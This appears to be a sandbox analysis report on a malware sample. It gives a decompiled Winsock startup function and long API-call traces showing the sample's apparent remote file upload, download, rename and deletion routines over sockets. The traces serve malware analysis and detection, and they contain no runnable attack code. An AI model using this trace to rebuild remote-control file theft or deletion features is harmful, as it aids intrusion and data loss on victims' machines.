                                            Download Yara Rule
                                            C-Code - Quality: 53%
                                            			E013B2074() {
				char _v404;
				signed int _t2;
				char _t4;

				_t2 =  &_v404;
				_push(_t2);
				_push(0x202); // executed
				L013C4194(); // executed
				asm("sbb al, al");
				_t4 =  ~_t2 + 1;
				 *0x13cb730 = _t4;
				return _t4;
			}






                                            0x013b207d
                                            0x013b2083
                                            0x013b2084
                                            0x013b2089
                                            0x013b2090
                                            0x013b2092
                                            0x013b2094
                                            0x013b209a

                                            APIs
                                            • WSAStartup.WS2_32(00000202,?), ref: 013B2089
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Startup
                                            • String ID:
                                            • API String ID: 724789610-0
                                            • Opcode ID: 5fde8f59f42242d766cdecef298c2dfbd2bbc2ea993bb303efd0115830bcbcac
                                            • Instruction ID: e7bec2c9690af0ca84af340d7889080cba3d011f239d81686fb1bfa9d7e29b0c
                                            • Opcode Fuzzy Hash: 5fde8f59f42242d766cdecef298c2dfbd2bbc2ea993bb303efd0115830bcbcac
                                            • Instruction Fuzzy Hash: FCC08C2155421C5DEA11A2B9981BAE5B76C972AF84F4402A99A42830CBD380A91D4372
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            Function 013B3C4A, Relevance: 240.6, APIs: 121, Strings: 16, Instructions: 868fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 013B3C60
                                            • SetEvent.KERNEL32(?), ref: 013B3C69
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 013B3C72
                                            • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6F525DF0), ref: 013B3C8A
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(Function_0001B310), ref: 013B3C9B
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 013B3CAA
                                              • Part of subcall function 013C29EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C29FA
                                              • Part of subcall function 013C29EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2A11
                                              • Part of subcall function 013C29EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5), ref: 013C2A27
                                              • Part of subcall function 013C29EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 013C2A45
                                              • Part of subcall function 013C29EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2A4F
                                              • Part of subcall function 013C29EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2A58
                                              • Part of subcall function 013C29EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2A6D
                                              • Part of subcall function 013C29EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2A7A
                                              • Part of subcall function 013C29EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2ACC
                                              • Part of subcall function 013C29EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2AD5
                                              • Part of subcall function 013C29EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2ADE
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 013B3D11
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 013B3D27
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 013B3D5F
                                              • Part of subcall function 013B3816: CreateFileW.KERNEL32(0000FDE8,80000000,00000000,00000000,00000003,00000080,00000000,?,Function_0001B310,00000000), ref: 013B3845
                                              • Part of subcall function 013B3816: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 013B385C
                                              • Part of subcall function 013B3816: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B3B9B
                                              • Part of subcall function 013B3816: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B3BA4
                                              • Part of subcall function 013B3816: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B3BAD
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 013B3D7A
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Uploaded file: ,00000000,?,00000000,?,00000000,00000000), ref: 013B3DB1
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 013B3DD6
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000004,?,?,?,?,?,?,?,00000000), ref: 013B4199
                                            • atoi.MSVCRT ref: 013B41A0
                                              • Part of subcall function 013B3473: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(Function_0001B300,013C5664,[INFO],[DEBUG],00000000,?,013B41B5,?,?,00000000), ref: 013B3499
                                              • Part of subcall function 013B3473: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 013B34AC
                                              • Part of subcall function 013B3473: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00000000), ref: 013B34B5
                                              • Part of subcall function 013B3473: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 013B34CE
                                              • Part of subcall function 013B3473: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00000000), ref: 013B34DB
                                              • Part of subcall function 013B3473: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 013B34F0
                                              • Part of subcall function 013B3473: recv.WS2_32(00000000,?,0000FDE8,00000000), ref: 013B3517
                                              • Part of subcall function 013B3473: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(?,00000000,00000000,?,0000FDE8,00000000), ref: 013B3534
                                              • Part of subcall function 013B3473: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 013B3541
                                              • Part of subcall function 013B3473: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 013B3556
                                              • Part of subcall function 013B3473: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(013C5664), ref: 013B3560
                                              • Part of subcall function 013B3473: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000004,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 013B3578
                                            • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 013B41C3
                                              • Part of subcall function 013C2718: _itoa.MSVCRT ref: 013C2736
                                              • Part of subcall function 013C2718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,013BCC05,?,00000000,013CB310,00000000,013CB310,?), ref: 013C274A
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Downloaded file size: ,00000000,?,?,?,00000000), ref: 013B41E1
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?,?,?,Downloaded file size: ,00000000,?,?,?,00000000), ref: 013B41EE
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B4202
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000), ref: 013B4223
                                            • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 013B422D
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 013B4237
                                              • Part of subcall function 013C2D56: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,013C623C), ref: 013C2D93
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013B424C
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Downloaded file: ,00000000,?,00000000,?,00000000,00000000), ref: 013B427E
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Downloaded file: ,00000000,?,00000000,?,00000000,00000000), ref: 013B428B
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 013B429F
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 013B42AB
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(013C5664,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 013B42C2
                                              • Part of subcall function 013B2440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(013CBE70,?,?,?,?,?,?,?,?,013B20DF,013BCF62,?,013BCF62,0000004B), ref: 013B244A
                                              • Part of subcall function 013B2440: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,013B20DF,013BCF62,?,013BCF62,0000004B), ref: 013B2463
                                              • Part of subcall function 013B2440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,013B20DF,013BCF62,?,013BCF62,0000004B), ref: 013B246E
                                              • Part of subcall function 013B2440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,013B20DF,013BCF62,?,013BCF62,0000004B), ref: 013B247B
                                              • Part of subcall function 013B2440: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,013B20DF,013BCF62,?,013BCF62,0000004B), ref: 013B248D
                                              • Part of subcall function 013B2440: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,013B20DF,013BCF62,?,013BCF62,0000004B), ref: 013B2498
                                              • Part of subcall function 013B2440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,013B20DF,013BCF62,?,013BCF62,0000004B), ref: 013B24A7
                                              • Part of subcall function 013B2440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,013B20DF,013BCF62,?,013BCF62,0000004B), ref: 013B24B1
                                              • Part of subcall function 013B2440: send.WS2_32(?,00000000), ref: 013B24BB
                                              • Part of subcall function 013B2440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,013B20DF,013BCF62,?,013BCF62,0000004B), ref: 013B2512
                                              • Part of subcall function 013B2440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,013B20DF,013BCF62,?,013BCF62,0000004B), ref: 013B251B
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Failed to download file: ,00000000,?,00000000,?,00000000,00000000), ref: 013B4300
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ERROR],?,?,?,Failed to download file: ,00000000,?,00000000,?,00000000,00000000), ref: 013B4311
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 013B4325
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 013B4331
                                            • closesocket.WS2_32(?), ref: 013B433A
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000,?,00000000,00000001,00000000,00000000), ref: 013B43F7
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,00000001,00000000,00000000), ref: 013B4401
                                            • CreateDirectoryW.KERNEL32(00000000,?,?,00000001,00000000,00000000), ref: 013B4408
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00000001,00000000,00000000), ref: 013B4414
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00000001,00000000,00000000), ref: 013B4420
                                            • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@G@Z.MSVCP60(0000002A,?,?,00000001,00000000,00000000), ref: 013B442B
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00000000), ref: 013B443A
                                            • ?rfind@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z.MSVCP60(0000005C,6F525DF8,00000001,00000000), ref: 013B4489
                                            • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000001), ref: 013B4499
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,?,?), ref: 013B44AE
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 013B44B8
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 013B44C2
                                            • _wrename.MSVCRT ref: 013B44C9
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013B44E0
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?), ref: 013B4587
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 013B4591
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013B459D
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 013B45A6
                                            • GetFileAttributesW.KERNEL32(00000000), ref: 013B45AD
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 013B45BA
                                              • Part of subcall function 013C2BEE: wcscpy.MSVCRT ref: 013C2C0A
                                              • Part of subcall function 013C2BEE: wcscat.MSVCRT ref: 013C2C1E
                                              • Part of subcall function 013C2BEE: wcscpy.MSVCRT ref: 013C2C2A
                                              • Part of subcall function 013C2BEE: wcscat.MSVCRT ref: 013C2C38
                                              • Part of subcall function 013C2BEE: FindFirstFileW.KERNEL32(?,?), ref: 013C2C4B
                                              • Part of subcall function 013C2BEE: wcscpy.MSVCRT ref: 013C2C6B
                                              • Part of subcall function 013C2BEE: FindNextFileW.KERNEL32(?,?), ref: 013C2C83
                                              • Part of subcall function 013C2BEE: wcscat.MSVCRT ref: 013C2CB4
                                              • Part of subcall function 013C2BEE: RemoveDirectoryW.KERNEL32(?), ref: 013C2CD9
                                              • Part of subcall function 013C2BEE: wcscpy.MSVCRT ref: 013C2CE9
                                              • Part of subcall function 013C2BEE: FindClose.KERNEL32(?), ref: 013C2D39
                                              • Part of subcall function 013C2BEE: RemoveDirectoryW.KERNEL32(?), ref: 013C2D42
                                              • Part of subcall function 013C2855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,013BCBF0,?,013CBA28,013CB310,?), ref: 013C2860
                                              • Part of subcall function 013C2855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,013BCBF0,?,013CBA28,013CB310,?), ref: 013C286C
                                              • Part of subcall function 013C2855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,013BCBF0,?,013CBA28,013CB310,?), ref: 013C2876
                                              • Part of subcall function 013B20C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,013CBE70,?,013BCF62,0000004B), ref: 013B20D1
                                              • Part of subcall function 013B20C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B20E7
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 013B45C9
                                            • DeleteFileW.KERNEL32(00000000), ref: 013B45D0
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Deleted file: ,00000000,?,?,?,?), ref: 013B45FA
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Deleted file: ,00000000,?,?,?,?), ref: 013B460B
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Unable to delete: ,00000000,?,?,?,?,00000055), ref: 013B4659
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ERROR],?,?,?,Unable to delete: ,00000000,?,?,?,?,00000055), ref: 013B466A
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000055), ref: 013B467E
                                            • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000001,013C5908,?,?,?,?,?,?,?,00000055), ref: 013B4694
                                            • ?rfind@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z.MSVCP60(0000005C,6F525DF8,?,?,?,?,?,00000055), ref: 013B46AC
                                            • ?resize@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEXI@Z.MSVCP60(00000001,?,?,?,?,?,00000055), ref: 013B46B7
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,?,0000002A,?,?,?,?,?,00000055), ref: 013B46CA
                                            • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,00000055), ref: 013B46D6
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000055), ref: 013B46E2
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000055), ref: 013B46F4
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000055), ref: 013B46FD
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,013C594C), ref: 013B44FA
                                              • Part of subcall function 013B3325: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,00000000), ref: 013B333B
                                              • Part of subcall function 013B3325: FindFirstFileW.KERNEL32(00000000,?,?,00000000), ref: 013B3342
                                              • Part of subcall function 013B3325: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000054), ref: 013B3468
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Unable to rename file!,Function_0001B310,013C5948), ref: 013B4523
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,013C5948), ref: 013B452D
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000059,?,?,?,?,?,013C5948), ref: 013B4547
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,013C5948), ref: 013B4550
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,013C5948), ref: 013B4559
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Uploaded file: ,00000000,?,00000000,?,00000000,00000000), ref: 013B3DC2
                                              • Part of subcall function 013C203B: GetLocalTime.KERNEL32(?), ref: 013C2052
                                              • Part of subcall function 013C203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,013C6BFC,?,013C5770,?,?,013B51EF,?), ref: 013C2087
                                              • Part of subcall function 013C203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,013B51EF,?), ref: 013C2094
                                              • Part of subcall function 013C203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,013B51EF,?), ref: 013C20A1
                                              • Part of subcall function 013C203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,013B51EF,?), ref: 013C20AE
                                              • Part of subcall function 013C203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,013B51EF,?), ref: 013C20B8
                                              • Part of subcall function 013C203B: printf.MSVCRT ref: 013C20BF
                                              • Part of subcall function 013C203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B51EF), ref: 013C20CB
                                              • Part of subcall function 013C203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B51EF), ref: 013C20D4
                                              • Part of subcall function 013C203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B51EF), ref: 013C20DD
                                              • Part of subcall function 013C203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B51EF), ref: 013C20E6
                                              • Part of subcall function 013C203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B51EF), ref: 013C20EF
                                              • Part of subcall function 013C203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B51EF), ref: 013C20F8
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Failed to upload file: ,00000000,?,00000000,?,00000000,00000000), ref: 013B3E09
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ERROR],?,?,?,Failed to upload file: ,00000000,?,00000000,?,00000000,00000000), ref: 013B3E1A
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 013B3E2E
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 013B3E37
                                              • Part of subcall function 013C27F5: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,013B464E,?,?,00000055), ref: 013C2804
                                              • Part of subcall function 013C27F5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,013B464E,?,?,00000055), ref: 013C280E
